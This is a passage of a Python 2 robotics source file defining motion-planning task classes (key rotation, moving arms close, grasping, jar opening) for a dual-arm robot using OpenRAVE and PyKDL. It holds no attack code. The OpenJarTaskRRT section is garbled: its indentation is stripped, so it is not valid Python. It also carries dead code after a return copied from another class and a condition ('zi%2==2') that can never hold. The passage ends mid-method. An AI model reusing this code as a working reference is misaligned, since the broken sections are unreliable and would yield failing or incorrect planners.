    def SampleGoal(self, start_q, shortest_path_len):
        """Sample a goal configuration satisfying checkGoal().

        The torso angle is sampled uniformly and the head pan/tilt are
        computed from inverse head kinematics (aiming at the target
        centroid); the remaining joints are sampled uniformly, or inside
        a ball of radius shortest_path_len around start_q when that is
        given. Returns a one-element list [q_goal] or None after 200
        failed attempts.
        """
        # Torso and head joints are set deterministically, so they are
        # excluded from the random (ball) sampling.
        ignore_dof = [self.dof_indices_map["torso_0_joint"], self.dof_indices_map["head_pan_joint"], self.dof_indices_map["head_tilt_joint"]]
        q_goal = np.empty(len(self.dof_names))
        for tries in range(200):
            # Random torso angle (kept 0.01 rad inside the limits).
            torso_0_joint_idx = self.dof_indices_map["torso_0_joint"]
            q_goal[torso_0_joint_idx] = random.uniform(self.dof_limits[torso_0_joint_idx][0]+0.01, self.dof_limits[torso_0_joint_idx][1]-0.01)
            # Head pan/tilt from the head-kinematics solver for this torso pose.
            self.head_kin.UpdateTorsoPose(q_goal[self.dof_indices_map["torso_0_joint"]], self.openrave.robot_rave.GetJoint("torso_1_joint").GetValue(0))
            self.head_kin.UpdateTargetPosition(self.head_target_B.x(), self.head_target_B.y(), self.head_target_B.z())
            self.head_kin.TransformTargetToHeadFrame()
            joint_pan, joint_tilt = self.head_kin.CalculateHeadPose()
            if joint_pan == None:
                continue
            # Clamp the head pose to the joint limits.
            joint_pan = max(joint_pan, self.dof_limits[self.dof_indices_map["head_pan_joint"]][0])
            joint_pan = min(joint_pan, self.dof_limits[self.dof_indices_map["head_pan_joint"]][1])
            joint_tilt = max(joint_tilt, self.dof_limits[self.dof_indices_map["head_tilt_joint"]][0])
            joint_tilt = min(joint_tilt, self.dof_limits[self.dof_indices_map["head_tilt_joint"]][1])
            q_goal[self.dof_indices_map["head_pan_joint"]] = joint_pan
            q_goal[self.dof_indices_map["head_tilt_joint"]] = joint_tilt
            if shortest_path_len == None:
                # Unconstrained: sample the remaining joints uniformly.
                for i in range(len(self.dof_names)):
                    if i in ignore_dof:
                        continue
                    q_goal[i] = random.uniform(self.dof_limits[i][0]+0.01, self.dof_limits[i][1]-0.01)
            else:
                # Constrained: sample the remaining joints inside a ball so
                # the full goal stays within shortest_path_len of start_q.
                diff = 0.0
                for dof_idx in ignore_dof:
                    diff += (start_q[dof_idx] - q_goal[dof_idx]) * (start_q[dof_idx] - q_goal[dof_idx])
                shortest_path_len2 = shortest_path_len*shortest_path_len - diff
                if shortest_path_len2 < 0.0:
                    continue
                shortest_path_len2 = math.sqrt(shortest_path_len2)
                q_goal2 = tree.uniformInBall(shortest_path_len2, self.dof_limits, start_q, ignore_dof=ignore_dof)
                for dof_idx in ignore_dof:
                    q_goal2[dof_idx] = q_goal[dof_idx]
                q_goal = q_goal2
            # sanity check
            if shortest_path_len != None and np.linalg.norm(q_goal-start_q) > shortest_path_len:
                print "ERROR: np.linalg.norm(q_goal-start_q) > shortest_path_len", np.linalg.norm(q_goal-start_q), ">", shortest_path_len
                exit(0)
            if self.checkGoal(q_goal):
                return [q_goal]
        return None
class KeyRotTaskRRT:
    """RRT planning task: reach a configuration, with the key (held in the
    right hand) at its pose near the keyhole, from which the key can be
    rotated through more than 190 degrees in total using Cartesian
    impedance wrist trajectories."""
    def __init__(self, openrave, args):
        # openrave: project OpenRAVE wrapper object; args: unused by this task.
        self.openrave = openrave
        # O: key/object frame, E: palm frame; identity here (they coincide).
        self.T_E_O = PyKDL.Frame()
        self.T_O_E = self.T_E_O.Inverse()
        # Key geometry expressed in the object frame O.
        self.key_axis_O = PyKDL.Vector(0,0,1)
        self.key_up_O = PyKDL.Vector(1,0,0)
        self.key_side_O = self.key_axis_O * self.key_up_O
        self.key_endpoint_O = PyKDL.Vector(0.000256401261281, -0.000625166847342, 0.232297442735)
        # Desired key pose near the keyhole, expressed in base frame B.
        self.T_B_O_nearHole = PyKDL.Frame(PyKDL.Rotation.Quaternion(0.71891504857, -0.0529880479354, 0.691118088949, 0.0520500417212), PyKDL.Vector(0.883081316461, -0.100813768303, 0.95381559114))
        # get the transformation from wrist to palm
        link_E = self.openrave.robot_rave.GetLink("right_HandPalmLink")
        link_W = self.openrave.robot_rave.GetLink("right_arm_7_link")
        T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
        T_World_W = conv.OpenraveToKDL(link_W.GetTransform())
        self.T_W_E = T_World_W.Inverse() * T_World_E
        self.T_E_W = self.T_W_E.Inverse()
        # Wrist poses for rotating the key about its axis from 0 to -180 deg
        # (10 steps), each stored with the corresponding angle...
        self.key_traj1_T_B_W = []
        for angle in np.linspace(0.0/180.0*math.pi, -180.0/180.0*math.pi, 10):
            T_B_W = self.T_B_O_nearHole * PyKDL.Frame(PyKDL.Rotation.Rot(self.key_axis_O, angle)) * self.T_O_E * self.T_E_W
            self.key_traj1_T_B_W.append( (T_B_W, angle) )
        # ...and from 0 to +180 deg.
        self.key_traj2_T_B_W = []
        for angle in np.linspace(0.0/180.0*math.pi, 180.0/180.0*math.pi, 10):
            T_B_W = self.T_B_O_nearHole * PyKDL.Frame(PyKDL.Rotation.Rot(self.key_axis_O, angle)) * self.T_O_E * self.T_E_W
            self.key_traj2_T_B_W.append( (T_B_W, angle) )
        self.velma_solvers = velmautils.VelmaSolvers()
        # Joints this task plans over.
        self.dof_names = [
            "left_arm_0_joint",
            "left_arm_1_joint",
            "left_arm_2_joint",
            "left_arm_3_joint",
            "right_arm_0_joint",
            "right_arm_1_joint",
            "right_arm_2_joint",
            "right_arm_3_joint",
            "right_arm_4_joint",
            "right_arm_5_joint",
            "right_arm_6_joint",
            "torso_0_joint",
        ]
        self.dof_indices = []
        self.dof_limits = []
        for joint_name in self.dof_names:
            joint = openrave.robot_rave.GetJoint(joint_name)
            self.dof_indices.append( joint.GetDOFIndex() )
            lim_lo, lim_up = joint.GetLimits()
            self.dof_limits.append( (lim_lo[0], lim_up[0]) )
        # The 7 right-arm joints solved by the IK solver.
        self.dof_names_ik = [
            "right_arm_0_joint",
            "right_arm_1_joint",
            "right_arm_2_joint",
            "right_arm_3_joint",
            "right_arm_4_joint",
            "right_arm_5_joint",
            "right_arm_6_joint",
        ]
        # Map joint name -> position in self.dof_names / self.dof_limits.
        self.dof_indices_map = {}
        for i in range(len(self.dof_names)):
            self.dof_indices_map[self.dof_names[i]] = i
        # Redundant (free) joint used when enumerating IK solutions.
        self.free_dof_idx = self.dof_indices_map[self.openrave.free_joint["right_arm"]]
        self.torso_0_joint_idx = self.dof_indices_map["torso_0_joint"]
        # Joints whose goal values come from IK / direct sampling rather
        # than from the random ball sampling around start_q.
        self.ignore_dof = [
            self.dof_indices_map["torso_0_joint"],
            self.dof_indices_map["right_arm_0_joint"],
            self.dof_indices_map["right_arm_1_joint"],
            self.dof_indices_map["right_arm_2_joint"],
            self.dof_indices_map["right_arm_3_joint"],
            self.dof_indices_map["right_arm_4_joint"],
            self.dof_indices_map["right_arm_5_joint"],
            self.dof_indices_map["right_arm_6_joint"]]
        self.other_dof = []
        for dof_name in self.dof_names:
            dof_idx = self.dof_indices_map[dof_name]
            if not dof_idx in self.ignore_dof:
                self.other_dof.append(dof_idx)
    def GetOtherDofIndices(self):
        """Return the task DOF indices not controlled by IK/torso sampling."""
        return self.other_dof
    def GetDofLimits(self):
        """Return the (lower, upper) limit pairs of the task joints."""
        return self.dof_limits
    def GetDofIndices(self):
        """Return the OpenRAVE DOF indices of the task joints."""
        return self.dof_indices
    def GetDofNames(self):
        """Return the names of the task joints."""
        return self.dof_names
    def getActiveDOF(self, q):
        """Extract this task's DOF values from the full configuration q."""
        q_ret = np.empty(len(self.dof_indices))
        q_ret_idx = 0
        for dof_idx in self.dof_indices:
            q_ret[q_ret_idx] = q[dof_idx]
            q_ret_idx += 1
        return q_ret
    def checkGoal(self, q):
        """Return True iff from configuration q the key can be rotated by
        more than 190 deg in total (both directions combined) along the
        precomputed Cartesian wrist trajectories."""
        # interpolate trajectory (in the cartesian space)
        self.openrave.robot_rave.SetDOFValues(q, self.dof_indices)
        link_E = self.openrave.robot_rave.GetLink("right_HandPalmLink")
        T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
        T_B_O = self.openrave.T_World_Br.Inverse() * T_World_E * self.T_E_O
        # The key must already be close (2 cm, 10 deg) to the near-hole pose.
        diff = PyKDL.diff(self.T_B_O_nearHole, T_B_O)
        if diff.vel.Norm() > 0.02 or diff.rot.Norm() > 10.0/180.0*math.pi:
            return False
        # Follow trajectory 1 (towards -180 deg) as far as the Cartesian
        # impedance solver can track it, updating the arm config each step.
        angle1 = 0.0
        for T_B_W, angle in self.key_traj1_T_B_W:
            init_js = self.openrave.getRobotConfigurationRos()
            traj = self.velma_solvers.getCartImpWristTraj(init_js, T_B_W)
            if traj == None:
                break
            angle1 = angle
            qar = {}
            for qi in range(len(traj[-1])):
                qar["right_arm_"+str(qi)+"_joint"] = traj[-1][qi]
            self.openrave.updateRobotConfigurationRos(qar)
        # Restore the start configuration, then follow trajectory 2
        # (towards +180 deg) the same way.
        self.openrave.robot_rave.SetDOFValues(q, self.dof_indices)
        angle2 = 0.0
        for T_B_W, angle in self.key_traj2_T_B_W:
            init_js = self.openrave.getRobotConfigurationRos()
            traj = self.velma_solvers.getCartImpWristTraj(init_js, T_B_W)
            if traj == None:
                break
            angle2 = angle
            qar = {}
            for qi in range(len(traj[-1])):
                qar["right_arm_"+str(qi)+"_joint"] = traj[-1][qi]
            self.openrave.updateRobotConfigurationRos(qar)
        # Total reachable rotation must exceed 190 deg.
        if abs(angle1-angle2) > 190.0/180.0*math.pi:
            return True
        else:
            return False
    def SampleGoal(self, start_q, shortest_path_len):
        """Sample goal configurations: random torso and free-joint values,
        right-arm IK at the near-hole end-effector pose, remaining joints
        sampled (optionally inside a ball of radius shortest_path_len
        around start_q); each candidate is verified with checkGoal().
        Returns a list of goals or None after 50 failed attempts."""
        self.openrave.switchCollisionModel("velmasimplified0")
        start_arm_q = np.empty(len(self.dof_names_ik))
        for dof_ik_idx in range(len(self.dof_names_ik)):
            start_arm_q[dof_ik_idx] = start_q[self.dof_indices_map[self.dof_names_ik[dof_ik_idx]]]
        # Desired end-effector pose for the key near the hole.
        T_B_E = self.T_B_O_nearHole * self.T_O_E
        q_goal = np.zeros(len(self.dof_names))
        for tries in range(50):
            # random free joint value for the arm
            q_goal[self.free_dof_idx] = random.uniform(self.dof_limits[self.free_dof_idx][0]+0.01, self.dof_limits[self.free_dof_idx][1]-0.01)
            freevalues = [ (q_goal[self.free_dof_idx]-self.dof_limits[self.free_dof_idx][0])/(self.dof_limits[self.free_dof_idx][1]-self.dof_limits[self.free_dof_idx][0]) ]
            # random torso joint value
            q_goal[self.torso_0_joint_idx] = random.uniform(self.dof_limits[self.torso_0_joint_idx][0]+0.01, self.dof_limits[self.torso_0_joint_idx][1]-0.01)
            self.openrave.robot_rave.SetDOFValues(q_goal, self.dof_indices)
            solutions = self.openrave.findIkSolutions(T_B_E, man_name="right_arm", freevalues=freevalues, filter_options=0)
#            solutions_dist = []
#            # sort the solutions
#            for sol in solutions:
#                dist = np.linalg.norm(start_arm_q-np.array(sol))
#                solutions_dist.append( (dist, sol) )
#            sorted_solutions = sorted(solutions_dist, key=operator.itemgetter(0))
            goal_list = []
#            for dist, sol in sorted_solutions:
            for sol in solutions:
                # Copy the IK solution into the goal configuration.
                for arm_dof_idx in range(len(self.dof_names_ik)):
                    dof_name = self.dof_names_ik[arm_dof_idx]
                    q_goal[self.dof_indices_map[dof_name]] = sol[arm_dof_idx]
                if shortest_path_len == None:
                    # Unconstrained: sample the remaining joints uniformly.
                    for i in range(len(self.dof_names)):
                        if i in self.ignore_dof:
                            continue
                        q_goal[i] = random.uniform(self.dof_limits[i][0]+0.01, self.dof_limits[i][1]-0.01)
                else:
                    # Constrained: keep the goal within shortest_path_len
                    # of start_q by sampling the rest inside a ball.
                    diff = 0.0
                    for dof_idx in self.ignore_dof:
                        diff += (start_q[dof_idx] - q_goal[dof_idx]) * (start_q[dof_idx] - q_goal[dof_idx])
                    shortest_path_len2 = shortest_path_len*shortest_path_len - diff
                    if shortest_path_len2 < 0.0:
                        continue
                    shortest_path_len2 = math.sqrt(shortest_path_len2)
                    q_goal2 = tree.uniformInBall(shortest_path_len2, self.dof_limits, start_q, ignore_dof=self.ignore_dof)
                    for dof_idx in self.ignore_dof:
                        q_goal2[dof_idx] = q_goal[dof_idx]
                    q_goal = q_goal2
                # sanity check
                if shortest_path_len != None and np.linalg.norm(q_goal-start_q) > shortest_path_len:
                    print "ERROR: np.linalg.norm(q_goal-start_q) > shortest_path_len", np.linalg.norm(q_goal-start_q), ">", shortest_path_len
                    exit(0)
                if self.checkGoal(q_goal):
                    goal_list.append(q_goal)
#                    return q_goal
            if len(goal_list) > 0:
                return goal_list
        return None
class MoveArmsCloseTaskRRT:
    """RRT planning task: bring both arms into a fixed "close to the body"
    pose, defined per joint by a tolerance band in self.dof_tol."""

    def __init__(self, openrave, args):
        # openrave: project OpenRAVE wrapper object; args: unused here.
        self.openrave = openrave
        # Both full 7-DOF arms are planned.
        self.dof_names = [
            "left_arm_0_joint",
            "left_arm_1_joint",
            "left_arm_2_joint",
            "left_arm_3_joint",
            "left_arm_4_joint",
            "left_arm_5_joint",
            "left_arm_6_joint",
            "right_arm_0_joint",
            "right_arm_1_joint",
            "right_arm_2_joint",
            "right_arm_3_joint",
            "right_arm_4_joint",
            "right_arm_5_joint",
            "right_arm_6_joint",
        ]
        # Goal tolerance band per joint; None means "anywhere within the
        # joint limits" and is filled in from the robot model below.
        self.dof_tol = [
            (1.8, 2.3),
            (1.9, 2.06),
            (-1.2, -1.0),
            (-2.06, -1.9),
            None,
            None,
            None,
            (0.7, 1.2),
            (-2.06, -1.9),
            (1.0, 1.2),
            (1.9, 2.06),
            None,
            None,
            None,
        ]
        self.dof_indices = []
        self.dof_limits = []
        for idx, joint_name in enumerate(self.dof_names):
            joint = openrave.robot_rave.GetJoint(joint_name)
            self.dof_indices.append(joint.GetDOFIndex())
            lim_lo, lim_up = joint.GetLimits()
            limits = (lim_lo[0], lim_up[0])
            self.dof_limits.append(limits)
            if self.dof_tol[idx] == None:
                self.dof_tol[idx] = limits
        # Map joint name -> position in self.dof_names / self.dof_tol.
        self.dof_indices_map = {}
        for idx, joint_name in enumerate(self.dof_names):
            self.dof_indices_map[joint_name] = idx
        self.other_dof = []

    def GetOtherDofIndices(self):
        """Return the non-goal-critical DOF indices (none for this task)."""
        return self.other_dof

    def GetDofLimits(self):
        """Return the (lower, upper) limit pairs of the task joints."""
        return self.dof_limits

    def GetDofIndices(self):
        """Return the OpenRAVE DOF indices of the task joints."""
        return self.dof_indices

    def GetDofNames(self):
        """Return the names of the task joints."""
        return self.dof_names

    def getActiveDOF(self, q):
        """Extract this task's DOF values from the full configuration q."""
        return np.array([q[dof_idx] for dof_idx in self.dof_indices])

    def checkGoal(self, q):
        """Return True iff every joint value lies inside its tolerance band."""
        for value, (lo, hi) in zip(q, self.dof_tol):
            if value < lo or value > hi:
                return False
        return True

    def SampleGoal(self, start_q, shortest_path_len):
        """Sample one goal configuration uniformly inside the tolerance box;
        start_q and shortest_path_len are ignored by this task."""
        q_goal = np.array([random.uniform(lo, hi) for (lo, hi) in self.dof_tol])
        return [q_goal]
class GraspTaskRRT:
    """RRT planning task: move the selected gripper so that its palm
    reaches one of the given grasp poses (T_B_E_list, in base frame B)."""
    def __init__(self, openrave, args):
        # args = (gripper side: "left"/"right", non-empty list of grasp
        # poses T_B_E in the base frame).
        if len(args) != 2:
            raise ValueError('GraspTaskRRT: wrong number of arguments: ' + str(len(args)))
        if args[0] != "left" and args[0] != "right":
            raise ValueError('GraspTaskRRT: wrong argument[0] value: ' + args[0])
        if len(args[1]) == 0:
            raise ValueError('GraspTaskRRT: wrong argument[1] value')
        self.openrave = openrave
        self.gripper = args[0]
        self.T_B_E_list = args[1]
        # get the transformation from wrist to palm
        link_E = self.openrave.robot_rave.GetLink(self.gripper + "_HandPalmLink")
        link_W = self.openrave.robot_rave.GetLink(self.gripper + "_arm_7_link")
        T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
        T_World_W = conv.OpenraveToKDL(link_W.GetTransform())
        self.T_W_E = T_World_W.Inverse() * T_World_E
        self.T_E_W = self.T_W_E.Inverse()
        # Joints this task plans over; the grasping arm gets all 7 joints,
        # the other arm only its first 4.
        self.dof_names = [
            "left_arm_0_joint",
            "left_arm_1_joint",
            "left_arm_2_joint",
            "left_arm_3_joint",
            "right_arm_0_joint",
            "right_arm_1_joint",
            "right_arm_2_joint",
            "right_arm_3_joint",
            "torso_0_joint",
        ]
        if self.gripper == "right":
            self.dof_names += [
                "right_arm_4_joint",
                "right_arm_5_joint",
                "right_arm_6_joint",
            ]
        else:
            self.dof_names += [
                "left_arm_4_joint",
                "left_arm_5_joint",
                "left_arm_6_joint",
            ]
        self.dof_indices = []
        self.dof_limits = []
        for joint_name in self.dof_names:
            joint = openrave.robot_rave.GetJoint(joint_name)
            self.dof_indices.append( joint.GetDOFIndex() )
            lim_lo, lim_up = joint.GetLimits()
            self.dof_limits.append( (lim_lo[0], lim_up[0]) )
        # The 7 joints of the grasping arm, solved by the IK solver.
        self.dof_names_ik = []
        for i in range(7):
            self.dof_names_ik.append( self.gripper + "_arm_" + str(i) + "_joint" )
        # Map joint name -> position in self.dof_names / self.dof_limits.
        self.dof_indices_map = {}
        for i in range(len(self.dof_names)):
            self.dof_indices_map[self.dof_names[i]] = i
        # Redundant (free) joint used when enumerating IK solutions.
        self.free_dof_idx = self.dof_indices_map[self.openrave.free_joint[self.gripper + "_arm"]]
        self.torso_0_joint_idx = self.dof_indices_map["torso_0_joint"]
        # Joints whose goal values come from IK / direct sampling rather
        # than from the random ball sampling around start_q.
        self.ignore_dof = [ self.dof_indices_map["torso_0_joint"] ]
        for dof_name in self.dof_names_ik:
            self.ignore_dof.append( self.dof_indices_map[dof_name] )
        # Grasp poses for which an IK goal was actually sampled; used by
        # checkGoal() as the set of acceptable end-effector poses.
        self.goals_T_B_E = []
        self.other_dof = []
        for dof_name in self.dof_names:
            dof_idx = self.dof_indices_map[dof_name]
            if not dof_idx in self.ignore_dof:
                self.other_dof.append(dof_idx)
    def GetOtherDofIndices(self):
        """Return the task DOF indices not controlled by IK/torso sampling."""
        return self.other_dof
    def GetDofLimits(self):
        """Return the (lower, upper) limit pairs of the task joints."""
        return self.dof_limits
    def GetDofIndices(self):
        """Return the OpenRAVE DOF indices of the task joints."""
        return self.dof_indices
    def GetDofNames(self):
        """Return the names of the task joints."""
        return self.dof_names
    def getActiveDOF(self, q):
        """Extract this task's DOF values from the full configuration q."""
        q_ret = np.empty(len(self.dof_indices))
        q_ret_idx = 0
        for dof_idx in self.dof_indices:
            q_ret[q_ret_idx] = q[dof_idx]
            q_ret_idx += 1
        return q_ret
    def checkGoal(self, q):
        """Return True iff at configuration q the palm pose is close
        (2 cm translation, 10 deg rotation) to one of the previously
        sampled grasp poses in self.goals_T_B_E."""
        # interpolate trajectory (in the cartesian space)
        self.openrave.robot_rave.SetDOFValues(q, self.dof_indices)
        # NOTE(review): the link name is hard-coded to the right palm even
        # when self.gripper == "left" -- confirm whether this is intentional.
        link_E = self.openrave.robot_rave.GetLink("right_HandPalmLink")
        T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
        T_B_E = self.openrave.T_World_Br.Inverse() * T_World_E
        for T_B_Eg in self.goals_T_B_E:
            diff = PyKDL.diff(T_B_Eg, T_B_E)
            if diff.vel.Norm() <= 0.02 and diff.rot.Norm() <= 10.0/180.0*math.pi:
                return True
        return False
    def SampleGoal(self, start_q, shortest_path_len):
        """Sample goal configurations whose end effector reaches one
        randomly chosen grasp pose from T_B_E_list.

        Uses random torso and free-joint values plus arm IK; the remaining
        joints are sampled uniformly, or inside a ball of radius
        shortest_path_len around start_q when that is given. Returns a
        list of goal configurations, or None after 50 failed attempts.
        """
        self.openrave.switchCollisionModel("velmasimplified0")
        start_arm_q = np.empty(len(self.dof_names_ik))
        for dof_ik_idx in range(len(self.dof_names_ik)):
            start_arm_q[dof_ik_idx] = start_q[self.dof_indices_map[self.dof_names_ik[dof_ik_idx]]]
        # Pick one target grasp pose at random.
        T_B_Ed = self.T_B_E_list[random.randint(0, len(self.T_B_E_list)-1)]
        q_goal = np.zeros(len(self.dof_names))
        for tries in range(50):
            # random free joint value for the arm
            q_goal[self.free_dof_idx] = random.uniform(self.dof_limits[self.free_dof_idx][0]+0.01, self.dof_limits[self.free_dof_idx][1]-0.01)
            freevalues = [ (q_goal[self.free_dof_idx]-self.dof_limits[self.free_dof_idx][0])/(self.dof_limits[self.free_dof_idx][1]-self.dof_limits[self.free_dof_idx][0]) ]
            # random torso joint value
            q_goal[self.torso_0_joint_idx] = random.uniform(self.dof_limits[self.torso_0_joint_idx][0]+0.01, self.dof_limits[self.torso_0_joint_idx][1]-0.01)
            self.openrave.robot_rave.SetDOFValues(q_goal, self.dof_indices)
            solutions = self.openrave.findIkSolutions(T_B_Ed, man_name=self.gripper+"_arm", freevalues=freevalues, filter_options=0)
            if len(solutions) == 0:
                continue
            goal_list = []
            for sol in solutions:
                # Copy the IK solution into the goal configuration.
                for arm_dof_idx in range(len(self.dof_names_ik)):
                    dof_name = self.dof_names_ik[arm_dof_idx]
                    q_goal[self.dof_indices_map[dof_name]] = sol[arm_dof_idx]
                if shortest_path_len == None:
                    # Unconstrained: sample the remaining joints uniformly.
                    for i in range(len(self.dof_names)):
                        if i in self.ignore_dof:
                            continue
                        q_goal[i] = random.uniform(self.dof_limits[i][0]+0.01, self.dof_limits[i][1]-0.01)
                else:
                    # Constrained: keep the goal within shortest_path_len
                    # of start_q by sampling the rest inside a ball.
                    diff = 0.0
                    for dof_idx in self.ignore_dof:
                        diff += (start_q[dof_idx] - q_goal[dof_idx]) * (start_q[dof_idx] - q_goal[dof_idx])
                    shortest_path_len2 = shortest_path_len*shortest_path_len - diff
                    if shortest_path_len2 < 0.0:
                        continue
                    shortest_path_len2 = math.sqrt(shortest_path_len2)
                    q_goal2 = tree.uniformInBall(shortest_path_len2, self.dof_limits, start_q, ignore_dof=self.ignore_dof)
                    for dof_idx in self.ignore_dof:
                        q_goal2[dof_idx] = q_goal[dof_idx]
                    q_goal = q_goal2
                # sanity check
                if shortest_path_len != None and np.linalg.norm(q_goal-start_q) > shortest_path_len:
                    print "ERROR: np.linalg.norm(q_goal-start_q) > shortest_path_len", np.linalg.norm(q_goal-start_q), ">", shortest_path_len
                    exit(0)
                # NOTE(review): T_B_Ed is appended once per IK solution, so
                # goals_T_B_E may accumulate duplicate poses.
                self.goals_T_B_E.append(T_B_Ed)
                goal_list.append(q_goal)
            if len(goal_list) > 0:
                return goal_list
        return None
class OpenJarTaskRRT:
def __init__(self, openrave, args):
if len(args) != 2:
raise ValueError('OpenJarTaskRRT: wrong number of arguments: ' + str(len(args)))
if args[0] != "left" and args[0] != "right":
raise ValueError('OpenJarTaskRRT: wrong argument[0] value: ' + args[0])
if len(args[1]) == 0:
raise ValueError('OpenJarTaskRRT: wrong argument[1] value: ' + args[0])
self.gripper_grasp = args[0]
self.grasps_T_J_E = args[1]
if self.gripper_grasp == 'right':
plut_jar = plutr
plut_lid = plutl
else:
plut_jar = plutl
plut_lid = plutr
R_J_Elid = PyKDL.Rotation.RotX(180.0/180.0*math.pi)
T_J_Elid = PyKDL.Frame(R_J_Elid) * PyKDL.Frame(PyKDL.Vector(0,0,-0.03))
# self.valid_T_T2_J = []
self.valid = {}
iterations = 0
x_set = np.arange(0.1, 1.1, 0.1)
y_set = np.arange(-0.4, 0.8, 0.1)
z_set = np.arange(-0.5, 0.5, 0.1)
xi = 0
for x in x_set:
yi = 0
for y in y_set:
zi = 0
for z in z_set:
pos = PyKDL.Vector(x,y,z)
rot_idx = 0
for rot in plutr.rotations:
T_T2_J = PyKDL.Frame(rot, pos)
iterations += 1
rot_idx += 1
zi += 1
yi += 1
xi += 1
print iterations
# exit(0)
map_rot_jar_lid = {}
rot_jar_idx = 0
for rot_jar in plut_jar.rotations:
map_rot_jar_lid[rot_jar_idx] = plut_lid.getClosestRot(PyKDL.Frame(rot_jar))
rot_jar_idx += 1
rot_map = {}
for grasp_idx in range(len(self.grasps_T_J_E)):
for rot_idx in range(len(plut_jar.rotations)):
R_T2_Ejar = plut_jar.rotations[rot_idx]
R_J_Ejar = self.grasps_T_J_E[grasp_idx][0].M
R_T2_J = R_T2_Ejar * R_J_Ejar.Inverse()
R_T2_Elid = R_T2_J * R_J_Elid
rot_map[ (grasp_idx, rot_idx) ] = plut_lid.getClosestRot(PyKDL.Frame(R_T2_Elid))
iterations = 0
poses_found = 0
coord_idx = 0
for coord in plut_jar.lookup_table:
print coord_idx, " / ", len(plut_jar.lookup_table), " valid:", len(self.valid), "poses_found:", poses_found
coord_idx += 1
xi, yi, zi = coord
if xi%2==0 or yi%2==0 or zi%2==2:
continue
x = plut_jar.x_set[xi]
y = plut_jar.y_set[yi]
z = plut_jar.z_set[zi]
rot_set = plut_jar.lookup_table[coord]
if len(rot_set) < 10:
continue
for rot_idx in rot_set:
T_T2_Ejar = PyKDL.Frame(plut_jar.rotations[rot_idx], PyKDL.Vector(x, y, z))
grasp_idx = 0
for T_J_Ejar, T_Ejar_J in self.grasps_T_J_E:
iterations += 1
T_T2_J = T_T2_Ejar * T_Ejar_J
T_T2_Elid = T_T2_J * T_J_Elid
x_idx_lid = plut_lid.getIdxX(T_T2_Elid.p.x())
y_idx_lid = plut_lid.getIdxY(T_T2_Elid.p.y())
z_idx_lid = plut_lid.getIdxZ(T_T2_Elid.p.z())
coord_lid = (x_idx_lid, y_idx_lid, z_idx_lid)
closest_rot = rot_map[ (grasp_idx, rot_idx) ]
if coord_lid in plut_lid.lookup_table and closest_rot in plut_lid.lookup_table[coord_lid]:
if not coord_lid in self.valid:
self.valid[coord_lid] = set()
self.valid[ coord_lid ].add(closest_rot)
poses_found += 1
grasp_idx += 1
print "iterations:", iterations
return
if len(args[1]) == 0:
raise ValueError('GraspTaskRRT: wrong argument[1] value')
self.openrave = openrave
self.gripper = args[0]
self.T_B_E_list = args[1]
# get the transformation from wrist to palm
link_E = self.openrave.robot_rave.GetLink(self.gripper + "_HandPalmLink")
link_W = self.openrave.robot_rave.GetLink(self.gripper + "_arm_7_link")
T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
T_World_W = conv.OpenraveToKDL(link_W.GetTransform())
self.T_W_E = T_World_W.Inverse() * T_World_E
self.T_E_W = self.T_W_E.Inverse()
self.dof_names = [
"left_arm_0_joint",
"left_arm_1_joint",
"left_arm_2_joint",
"left_arm_3_joint",
"left_arm_4_joint",
"left_arm_5_joint",
"left_arm_6_joint",
"right_arm_0_joint",
"right_arm_1_joint",
"right_arm_2_joint",
"right_arm_3_joint",
"right_arm_4_joint",
"right_arm_5_joint",
"right_arm_6_joint",
"torso_0_joint",
]
self.dof_indices = []
self.dof_limits = []
for joint_name in self.dof_names:
joint = openrave.robot_rave.GetJoint(joint_name)
self.dof_indices.append( joint.GetDOFIndex() )
lim_lo, lim_up = joint.GetLimits()
self.dof_limits.append( (lim_lo[0], lim_up[0]) )
self.dof_names_ik = []
for i in range(7):
self.dof_names_ik.append( self.gripper + "_arm_" + str(i) + "_joint" )
self.dof_indices_map = {}
for i in range(len(self.dof_names)):
self.dof_indices_map[self.dof_names[i]] = i
self.free_dof_idx = self.dof_indices_map[self.openrave.free_joint[self.gripper + "_arm"]]
self.torso_0_joint_idx = self.dof_indices_map["torso_0_joint"]
self.ignore_dof = [ self.dof_indices_map["torso_0_joint"] ]
for dof_name in self.dof_names_ik:
self.ignore_dof.append( self.dof_indices_map[dof_name] )
self.goals_T_B_E = []
self.other_dof = []
for dof_name in self.dof_names:
dof_idx = self.dof_indices_map[dof_name]
if not dof_idx in self.ignore_dof:
self.other_dof.append(dof_idx)
def GetOtherDofIndices(self):
return self.other_dof
def GetDofLimits(self):
return self.dof_limits
def GetDofIndices(self):
return self.dof_indices
def GetDofNames(self):
return self.dof_names
def getActiveDOF(self, q):
q_ret = np.empty(len(self.dof_indices))
q_ret_idx = 0
for dof_idx in self.dof_indices:
q_ret[q_ret_idx] = q[dof_idx]
q_ret_idx += 1
return q_ret
def checkGoal(self, q):
# interpolate trajectory (in the cartesian space)
self.openrave.robot_rave.SetDOFValues(q, self.dof_indices)
link_E = self.openrave.robot_rave.GetLink("right_HandPalmLink")
T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
T_B_E = self.openrave.T_World_Br.Inverse() * T_World_E
for T_B_Eg in self.goals_T_B_E:
diff = PyKDL.diff(T_B_Eg, T_B_E)
if diff.vel.Norm() <= 0.02 and diff.rot.Norm() <= 10.0/180.0*math.pi:
return True
return False
    def SampleGoal(self, start_q, shortest_path_len):
        """Sample goal configurations that reach one of the target end-effector poses.

        Picks a random target pose from self.T_B_E_list, then repeatedly (up to
        50 tries) samples random free-joint and torso values, asks the IK solver
        for arm solutions, and turns each solution into a full goal configuration.
        When shortest_path_len is given, the non-IK joints are sampled inside a
        ball around start_q so that the total distance stays within that bound.
        Returns a list of goal configurations, or None if no IK solution was
        found in any of the tries.
        """
        self.openrave.switchCollisionModel("velmasimplified0")
        # NOTE(review): start_arm_q is computed but never used below — possibly
        # leftover from an earlier version; confirm before removing.
        start_arm_q = np.empty(len(self.dof_names_ik))
        for dof_ik_idx in range(len(self.dof_names_ik)):
            start_arm_q[dof_ik_idx] = start_q[self.dof_indices_map[self.dof_names_ik[dof_ik_idx]]]
        # Pick one target end-effector pose at random.
        T_B_Ed = self.T_B_E_list[random.randint(0, len(self.T_B_E_list)-1)]
        q_goal = np.zeros(len(self.dof_names))
        for tries in range(50):
            # random free joint value for the arm
